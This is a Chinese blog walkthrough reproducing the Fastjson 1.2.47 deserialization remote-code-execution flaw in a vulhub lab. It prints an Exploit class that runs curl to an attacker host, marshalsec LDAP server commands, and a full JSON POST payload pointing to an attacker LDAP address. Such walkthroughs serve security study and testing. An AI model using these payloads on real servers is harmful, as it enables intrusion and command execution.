Fastjson v 1.2.47反序列化漏洞

最新推荐文章于 2024-08-08 17:20:38 发布
最新推荐文章于 2024-08-08 17:20:38 发布
阅读量1.8k 收藏
点赞数
分类专栏: 中间件安全 文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/122996558
版权

0x00 fastjson简介

fastjson是常用于解析java中的数据,将对象解析为json格式,被广泛应用于各大java项目中,首先爆出1.2.24反序列化rce,后增加了反序列化白名单的机制,不久在1.2.47版本中又被发现反序列化rce,可通过构造恶意的json反序列化rce

0x01 漏洞简介

1.查看数据包的返回内容,是否存在json格式解析
2.判断是否为fastjson序列化,不是Jackson反序序列化,验证poc
3.后续反弹shell等操作

0x02 漏洞复现 v-1.2.47

使用vulhub-docker环境复现:

cd fastjson/1.2.24-rce
docker-compose up -d


向服务器发送新的post请求,并且发送字段内容,返回正确解析,存在fastjson反序列化漏洞

构造poc类

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec("curl http://your IP/Hacker");
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
    public static void main(String[] args) throws Exception {
    }
}

编译poc类为class:

javac -poc类

vps加载本地加载LDAP服务,(需要下载marshalsec-0.0.3-SNAPSHOT-all.jar ,否则无法找到类加载)

marshalsec:`git clone https://github.com/RandomRobbieBF/marshalsec-jar`

加载服务:
python3 -m http.server

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://your IP:8000/#Exploit" 9999

注意:文件都需在同一目录下,以免导致出错

POC传参查看复现:

POST / HTTP/1.1
Host: 192.168.150.143:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 266

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://your IP:9999/Exploit",
        "autoCommit":true
    }
}

0x03 漏洞防范

升级版本,过滤json格式内的敏感参数

告白热
关注
专栏目录
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3413
Fastjson 1.2.47反序列化漏洞复现
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6374
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson反序列化漏洞fastjson-1.2.47
zyer
04-28 4084
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
Java代码审计-fastjson反序列化漏洞分析
最新发布
qq_44780157的博客
08-08 1972
Fastjson反序列化漏洞各个版本的原理浅析。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2743
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化Java Bean。
Fastjson【RCE1.2.47漏洞复现
02-24 1382
Fastjson漏洞原理和RCE1.2.47漏洞复现
Fastjson1.2.47反序列化漏洞
weixin_51151498的博客
01-05 997
Fastjson1.2.47反序列化漏洞
Fastjson<=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 934
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
fastjson<=1.2.47反序列化漏洞复现
DaWan
09-29 436
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
Fastjson 1.2.47 远程代码执行漏洞详解及修复策略》 Fastjson,一个由阿里巴巴开发的高性能、轻量级的Java语言JSON处理库,因其高效的解析速度和广泛的功能,在国内的互联网行业中被广泛应用。然而,任何优秀的...
Fastjson-1.2.47远程命令执行漏洞(标明坑位)
晚安這個未知的世界
09-21 1199
前言 最近一直想复现这个漏洞,但是一直没时间,也没怎么在网上找到真的有用的文章,太多水文了,10篇文章有9篇都是一模一样的copy,还有一篇就只copy了一半,另一半就不搞了,真的是有其人的,于是花了一点时间去复现这个洞,毕竟工作上有可能会遇到的,并且也标明了一些坑位,反正按照这篇文章是可以100%机率可以复现成功的 漏洞概述 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的sett
Fastjson <= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 439
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
漏洞库】Fastjson_1.2.47_rce
yuan_boss的博客
09-08 1174
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
漏洞复现】Fastjson_1.2.47_rce
过期的秋刀鱼
11-04 824
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。后可向其POST新的JSON对象,后端会利用fastjson进行解析。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。构造反弹shell,进行base64编码。将content-type修改为。即可看到一个json对象被返回。
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 768
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
Java代码审计——Fastjson1.2.47反序列化漏洞
王嘟嘟的博客
02-11 423
在进行整理的时候突然看到Fastjson1.2.47漏洞没有整理,所以这里重新整理。
vulhub复现之fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2930
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
Fastjson 1.2.47 远程命令执行漏洞(CNVD-2019-22238)
黑白的博客
11-23 1973
声明 好好学习,天天向上 漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。 Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可
Fastjson 1.2.47 远程命令执行漏洞
m0_63241485的博客
08-17 1236
astjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值